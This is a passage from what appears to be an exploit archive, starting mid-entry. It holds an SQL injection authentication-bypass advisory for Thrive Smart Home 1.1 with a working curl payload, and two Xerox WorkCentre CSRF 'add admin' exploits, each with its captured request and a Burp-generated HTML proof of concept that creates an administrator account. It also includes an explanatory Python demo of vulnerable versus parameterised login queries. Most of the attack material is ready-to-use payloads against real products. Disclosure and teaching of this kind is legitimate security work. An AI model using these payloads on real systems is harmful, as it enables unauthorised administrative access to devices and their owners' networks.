      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2,5,1," />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Thrive Smart Home 1.1 - Authentication Bypass
# Exploit: Thrive Smart Home 1.1 - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Thrive
# Product web page: http://www.thrivesmarthomes.com
# Affected version: 1.1
# Tested on: Apache/2.4.41 (centos)
#            OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5554
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php


Thrive Smart Home v1.1 SQL Injection Authentication Bypass


Vendor: Thrive
Product web page: http://www.thrivesmarthomes.com
Affected version: 1.1

Summary: As smart home technology becomes more affordable and easy to install
with services offered by Thrive Smart Homes, there are some great options
available to give your home a high-tech makeover. If the convenience of feeding
your cat or turning on your air conditioning with a tap on your smartphone isn't
enough of a reason to make the investment, consider how conveniently you can
protect your home and belongings. From Wi-Fi-equipped smoke detectors to plugs
with auto turn-offs, smart homes with their always-on connectivity and
notification systems allow consumers to quickly respond to the unexpected. For
instance, if you install a smart water leak and moisture monitoring device, you
can set up alerts on your phone for unusual changes in moisture and stop leaks
before they cause major flooding or mold. It's a convenient way to proactively
protect your home from costly damage, whether it's an overflowing laundry tub, a
cracked washer hose, or a leaky water heater.

Desc: The application suffers from an SQL injection vulnerability. Input passed
through the 'user' POST parameter in checklogin.php is not properly sanitised
before being used in SQL queries. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code and bypass the authentication mechanism.

Tested on: Apache httpd 2.4.25 (Raspbian)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5554
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php


21.10.2019

--


$ curl http://192.168.1.1:8080/raspberry/include/checklogin.php -X POST -d"submit=LOGIN&user=' or 1=1#&pass=pass" -i
HTTP/1.1 302 Found
Date: Mon, 21 Oct 2019 23:35:18 GMT
Server: Apache/2.4.25 (Raspbian)
Set-Cookie: PHPSESSID=6cu3frj0qes9c96v5de5vp37e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: ../home.php
Content-Length: 1
Content-Type: text/html; charset=UTF-8
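Both the elearning-script entry above and this Thrive advisory describe the same defect: a login query assembled by string concatenation. The Python 3 script below is an added example (not code from either product) that shows the SQL text the two payloads on this page produce, then runs an equivalent bypass against an in-memory SQLite database and shows that the parameterised query resists it. The table, column names and the single account are constructed for the demo. The page's own payloads are MySQL-specific, so they are only rendered, not executed: '#' is not a comment marker in SQLite, and the '=''or' form relies on MySQL evaluating (user='')='' as 0=0 (the empty string converts to 0 in a numeric comparison), which SQLite does not do. The live demo therefore uses the SQLite equivalent ' OR 1=1 --.

```python
# Added example (Python 3), not code from elearning-script or Thrive Smart Home:
# vulnerable string-built login query vs. the parameterised form.
import sqlite3

ELEARNING_PAYLOAD = "'=''or'"     # elearning-script entry on this page (MySQL semantics)
THRIVE_PAYLOAD = "' or 1=1#"      # Thrive entry on this page ('#' is a MySQL line comment)
SQLITE_PAYLOAD = "' OR 1=1 --"    # constructed equivalent in SQLite syntax, used for the live demo

def build_login_query(user, password):
    """The vulnerable pattern: untrusted input spliced into the SQL text."""
    return "SELECT id FROM users WHERE user='%s' AND pass='%s'" % (user, password)

def demo_db():
    """In-memory SQLite database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    conn.execute("INSERT INTO users (user, pass) VALUES ('admin', 'c0rrect-h0rse')")
    conn.commit()
    return conn

def login_unsafe(conn, user, password):
    """Runs the concatenated query; returns the id of the first matching row or None."""
    row = conn.execute(build_login_query(user, password)).fetchone()
    return row[0] if row else None

def login_safe(conn, user, password):
    """Bound parameters: the payload is compared as data and never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE user=? AND pass=?",
                       (user, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    # What the two payloads on this page turn the query into (MySQL would run these):
    print(build_login_query(ELEARNING_PAYLOAD, ELEARNING_PAYLOAD))
    print(build_login_query(THRIVE_PAYLOAD, "pass"))
    db = demo_db()
    print("unsafe:", login_unsafe(db, SQLITE_PAYLOAD, "anything"))  # logs in as id 1 (admin)
    print("safe:  ", login_safe(db, SQLITE_PAYLOAD, "anything"))    # None
```

For the elearning payload the rendered query is user=''=''or'' AND pass=''=''or'', which MySQL parses as ((user='')='') OR ('' AND ((pass='')='')) OR ''; the first term is true for every row because 0='' is 0=0 there, so the first user in the table is returned. The Thrive payload simply comments out the password check. The bound-parameter version fails both, because the quote characters never reach the SQL parser.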
-
XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/
# Software : Xerox Printer
# Product Version: WorkCentre® 7855
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was found in the Xerox WorkCentre® 7855 printer. The request that adds a user
# through the Device User Database form is captured in an intercepting proxy and turned into the CSRF
# PoC HTML page below. The add-user request is posted to the xerox.set URI.
# (The frmUserName value must be unique.)
# The PoC replays the captured CSRFToken value verbatim, so the attack depends on the device accepting
# that token for a session other than the one it was issued to. Confirm this on the target (replay the
# request with a stale or altered token) before reporting.

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:13:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 11947

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2,5,1," />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series
# Software : Xerox Printer
# Product Version: WorkCentre® 7830
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was found in the Xerox WorkCentre® 7830 printer. The request that adds a user
# through the Device User Database form is captured in an intercepting proxy and turned into the CSRF
# PoC HTML page below. The add-user request is posted to the xerox.set URI.
# (The frmUserName value must be unique.)
# The PoC replays the captured CSRFToken value verbatim, so the attack depends on the device accepting
# that token for a session other than the one it was issued to. Confirm this on the target (replay the
# request with a stale or altered token) before reporting.

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:34:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 15022

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2,5,1," />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>